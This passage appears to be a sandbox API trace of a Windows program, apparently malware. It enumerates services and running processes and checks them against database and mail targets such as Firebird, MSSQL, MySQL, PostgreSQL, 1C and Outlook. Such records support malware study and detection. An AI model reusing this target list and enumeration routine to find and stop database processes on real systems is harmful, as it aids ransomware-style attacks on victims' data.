-1 [0268.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0268.621] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0268.621] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0268.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0268.621] lstrlenW (lpString="lmhosts") returned 7 [0268.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0268.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0268.621] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0268.621] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0268.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0268.621] lstrlenW (lpString="MMCSS") returned 5 [0268.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0268.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0268.621] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0268.621] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0268.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0268.621] lstrlenW (lpString="MpsSvc") returned 6 [0268.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0268.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0268.621] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0268.621] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0268.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0268.622] lstrlenW (lpString="nsi") returned 3 [0268.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0268.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0268.622] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0268.622] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0268.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0268.622] lstrlenW (lpString="PlugPlay") returned 8 [0268.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0268.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0268.622] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0268.622] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0268.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0268.622] lstrlenW (lpString="Power") returned 5 [0268.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0268.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0268.622] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0268.622] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0268.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0268.622] lstrlenW (lpString="ProfSvc") returned 7 [0268.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0268.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0268.622] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0268.622] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0268.622] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0268.622] lstrlenW (lpString="RpcEptMapper") returned 12 [0268.622] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0268.622] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0268.622] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0268.623] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0268.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0268.623] lstrlenW (lpString="RpcSs") returned 5 [0268.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0268.623] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0268.623] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0268.623] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0268.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0268.623] lstrlenW (lpString="SamSs") returned 5 [0268.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0268.623] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0268.623] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0268.623] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0268.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0268.623] lstrlenW (lpString="Schedule") returned 8 [0268.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0268.623] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0268.623] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0268.623] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0268.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0268.623] lstrlenW (lpString="SENS") returned 4 [0268.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0268.623] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0268.623] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0268.623] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0268.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0268.623] lstrlenW (lpString="ShellHWDetection") returned 16 [0268.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0268.623] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0268.623] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0268.623] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0268.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0268.624] lstrlenW (lpString="Spooler") returned 7 [0268.624] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0268.624] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0268.624] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0268.624] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0268.624] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0268.624] lstrlenW (lpString="Themes") returned 6 [0268.624] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0268.624] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0268.624] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0268.624] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0268.624] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0268.624] lstrlenW (lpString="UxSms") returned 5 [0268.624] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0268.624] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0268.624] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0268.624] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0268.624] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0268.624] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4264fc0 | out: hHeap=0x4a0000) returned 1 [0268.624] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x318 [0268.626] Process32FirstW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.626] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0268.626] lstrlenW (lpString="System") returned 6 [0268.626] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0268.626] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0268.626] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0268.626] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0268.626] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0268.627] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0268.627] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0268.627] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0268.627] lstrlenW (lpString="smss.exe") returned 8 [0268.627] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0268.627] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0268.627] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0268.627] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0268.627] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0268.627] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0268.627] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0268.627] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.627] lstrlenW (lpString="csrss.exe") returned 9 [0268.627] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0268.627] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0268.627] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0268.628] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0268.628] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0268.628] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0268.628] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0268.628] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0268.628] lstrlenW (lpString="wininit.exe") returned 11 [0268.628] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0268.628] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0268.628] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0268.628] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0268.628] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0268.628] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0268.628] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0268.628] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.629] lstrlenW (lpString="csrss.exe") returned 9 [0268.629] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0268.629] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0268.629] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0268.629] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0268.629] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0268.629] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0268.629] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0268.629] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0268.629] lstrlenW (lpString="winlogon.exe") returned 12 [0268.629] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0268.629] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0268.629] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0268.629] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0268.629] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0268.629] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0268.629] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0268.629] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0268.630] lstrlenW (lpString="services.exe") returned 12 [0268.630] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0268.630] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0268.630] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0268.630] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0268.630] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0268.630] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0268.630] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0268.630] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0268.630] lstrlenW (lpString="lsass.exe") returned 9 [0268.630] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0268.630] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0268.630] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0268.630] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0268.630] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0268.630] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0268.630] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0268.630] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0268.631] lstrlenW (lpString="lsm.exe") returned 7 [0268.631] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0268.631] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0268.631] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0268.631] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0268.631] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0268.631] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0268.631] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0268.631] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.632] lstrlenW (lpString="svchost.exe") returned 11 [0268.632] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.632] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.632] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.632] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.632] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.632] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.632] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.632] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.632] lstrlenW (lpString="svchost.exe") returned 11 [0268.632] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.632] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.632] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.632] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.632] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.632] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.632] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.632] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.633] lstrlenW (lpString="svchost.exe") returned 11 [0268.633] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.633] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.633] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.633] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.633] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.633] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.633] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.633] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.637] lstrlenW (lpString="svchost.exe") returned 11 [0268.637] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.637] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.637] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.637] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.637] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.637] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.637] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.637] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.638] lstrlenW (lpString="svchost.exe") returned 11 [0268.638] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.638] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.638] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.638] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.638] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.638] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.638] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.638] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0268.638] lstrlenW (lpString="audiodg.exe") returned 11 [0268.638] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0268.638] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0268.638] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0268.638] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0268.638] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0268.638] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0268.638] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0268.639] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.639] lstrlenW (lpString="svchost.exe") returned 11 [0268.639] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.639] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.639] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.639] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.639] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.639] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.639] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.639] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0268.639] lstrlenW (lpString="userinit.exe") returned 12 [0268.639] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0268.639] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0268.639] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0268.639] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0268.639] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0268.640] lstrcmpiW (lpString1="mysqld.exe", lpString2="userinit.exe") returned -1 [0268.640] lstrcmpiW (lpString1="sqlservr.exe", lpString2="userinit.exe") returned -1 [0268.640] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0268.640] lstrlenW (lpString="explorer.exe") returned 12 [0268.640] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0268.640] lstrlenW (lpString="dwm.exe") returned 7 [0268.640] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.641] lstrlenW (lpString="svchost.exe") returned 11 [0268.641] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0268.641] lstrlenW (lpString="agent1c.exe") returned 11 [0268.641] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0268.642] lstrlenW (lpString="spoolsv.exe") returned 11 [0268.642] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0268.642] lstrlenW (lpString="reader_sl.exe") returned 13 [0268.642] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0268.642] lstrlenW (lpString="dllhost.exe") returned 11 [0268.642] Process32NextW (in: hSnapshot=0x318, lppe=0x20efd34 | out: 